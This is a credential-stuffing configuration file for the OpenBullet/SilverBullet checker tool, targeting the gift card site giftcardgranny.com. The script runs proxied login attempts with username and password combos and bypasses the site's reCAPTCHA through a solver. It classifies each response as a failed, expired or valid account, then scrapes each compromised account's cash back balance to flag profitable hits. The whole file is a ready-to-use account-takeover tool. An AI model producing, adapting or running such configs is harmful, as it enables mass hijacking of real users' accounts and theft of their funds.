[SETTINGS]
{
  "Name": "Giftcardgranny",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2022-01-20T21:30:16.5201307+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Giftcardgranny",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://www.giftcardgranny.com/secure/login/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

SOLVECAPTCHA ReCaptchaV2 "6LcnQ1cUAAAAAIVhjDZ9V22HICQGpSQWv9gXg8Bq" "https://www.giftcardgranny.com/secure/login/" IsInvisible=TRUE 

#LOGIN REQUEST POST "https://www.giftcardgranny.com/secure/login_check/" 
  CONTENT "_username=<USER>&_password=<PASS>&_remember_me=on&_target_path=https%3A%2F%2Fwww.giftcardgranny.com%2Faccount%2F&_failure_path=https%3A%2F%2Fwww.giftcardgranny.com%2Fsecure%2Flogin%2F&google_recaptcha_id=0&g-recaptcha-response=<SOLUTION>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-length: 736" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://www.giftcardgranny.com" 
  HEADER "referer: https://www.giftcardgranny.com/secure/login/" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-gpc: 1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Mobile Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Oops, the username or password you entered was incorrect. Please try again." 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "Your password has expired. Please check your email for instructions to update your password. Thank you." 
  KEYCHAIN Success OR 
    KEY "Dashboard" 

REQUEST GET "https://www.giftcardgranny.com/account/" 
  
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "referer: https://www.giftcardgranny.com/secure/signup/" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-gpc: 1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Mobile Safari/537.36" 

#balance PARSE "<SOURCE>" LR "<h3 class=\"account-tile__header\">My cash back balance<span class=\"hide-on-med-and-up\">:</span></h3><div class=\"account-tile__icon\">" "</div>" CreateEmpty=FALSE -> CAP "balance" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<balance>" EqualTo "0.00$" 
  KEYCHAIN Success OR 
    KEY "<balance>" NotEqualTo "0.00$" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

